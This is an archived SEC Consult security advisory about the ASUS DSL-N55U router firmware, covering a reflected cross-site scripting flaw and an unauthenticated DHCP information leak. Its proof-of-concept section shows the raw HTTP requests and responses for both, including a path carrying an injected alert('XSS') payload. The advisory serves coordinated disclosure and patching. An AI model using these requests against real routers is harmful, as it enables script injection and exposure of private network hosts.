lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <f19cb45d-b571-00cb-72f3-146d86b371dd@sec-consult.com>
Date: Fri, 24 Jun 2016 10:58:37 +0200
From: SEC Consult Vulnerability Lab <research@...-consult.com>
To: <bugtraq@...urityfocus.com>, <fulldisclosure@...lists.org>
Subject: SEC Consult SA-20160624-0 :: ASUS DSL-N55U router XSS and information
 disclosure

SEC Consult Vulnerability Lab Security Advisory < 20160624-0 >
=======================================================================
              title: XSS and information disclosure vulnerability
            product: ASUS DSL-N55U router
 vulnerable version: 3.0.0.4.376_2736
      fixed version: 3.0.0.4_380_3679
         CVE number: requested
             impact: Medium
           homepage: https://www.asus.com/
              found: 2016-04-12
                 by: P. Morimoto (Office Bangkok)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow
                     Singapore - Vienna (HQ) - Vilnius - Zurich

                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"ASUS has long been at the forefront of this growth and while the company
started life as a humble motherboard manufacturer with just a handful of
employees, it is now the leading technology company in Taiwan with over
12,500 employees worldwide. ASUS makes products in almost every area of
Information Technology too, including PC components, peripherals,
notebooks, tablets, servers and smartphones."

Source: https://www.asus.com/sg/About_ASUS/The_Meaning_of_ASUS


Business recommendation:
------------------------
SEC Consult recommends not to use this device until a thorough security review
has been performed by security professionals and all identified issues have
been resolved.


Vulnerability overview/description:
-----------------------------------
1. Reflected Cross-Site Scripting
The vulnerability exists in the "httpd" binary in the ASUS DSL-N55U firmware.
If the web path is longer than 50 characters, it will redirect a user to
the cloud_sync.asp page with the web path as a value of a GET parameter.

Due to the lack of input validation, an attacker can insert malicious JavaScript
code to be executed under a victim's browser context.

No authentication is required.

2. Remote DHCP Information Disclosure
An unauthenticated attacker can gain access to DHCP information including
the hostname and private IP addresses of the local machines connected to the
router from the WAN IP address.


Proof of concept:
-----------------
1. Reflected Cross-Site Scripting
HTTP Request:
GET /111111111111111111111111111111111111111'+alert('XSS')+' HTTP/1.1
Host: <ASUS router IP>

HTTP Response:
HTTP/1.0 200 OK
Server: httpd
Date: Tue, 12 Apr 2016 09:04:48 GMT
Content-Type: text/html
Connection: close
<HTML><HEAD><script>location.href='/cloud_sync.asp?flag=111111111111111111111111111111111111111'+alert('XSS')+'';</script>
</HEAD></HTML>

2. Remote DHCP Information Disclosure
HTTP Request:
GET /Nologin.asp HTTP/1.1
Host: <ASUS router IP>

HTTP Response:
HTTP/1.0 200 Ok
Server: httpd
[...]
var dhcpLeaseInfo = [['<ip-1>', '<hostname-1>'],['<ip-2>',
'<hostname-2>'],['<ip-N>', '<hostname-N>']];;
function initial(){
[...]

Vulnerable / tested versions:
-----------------------------
The following firmware has been tested which was the most recent version
at the time of discovery:

- 3.0.0.4.376_2736 (2015/01/19 update)

URL: https://www.asus.com/support/Download/11/2/0/75/aOKU9r3fCf3pyi95/29/


Vendor contact timeline:
------------------------
2016-06-02: Contacting vendor through privacy@...s.com and netadmin@...s.com.tw.
2016-06-03: ASUS responds and establishes encrypted communication channel.
2016-06-06: Sending PGP encrypted security advisory to ASUS.
2016-06-20: Vulnerability is fixed in beta firmware.
2016-06-24: Public release of the advisory.


Solution:
---------
Upgrade to firmware version 3.0.0.4_380_3679 or later.


Workaround:
-----------
No workaround available.


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Pichaya Morimoto / @2016


Download attachment "smime.p7s" of type "application/pkcs7-signature" (3993 bytes)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ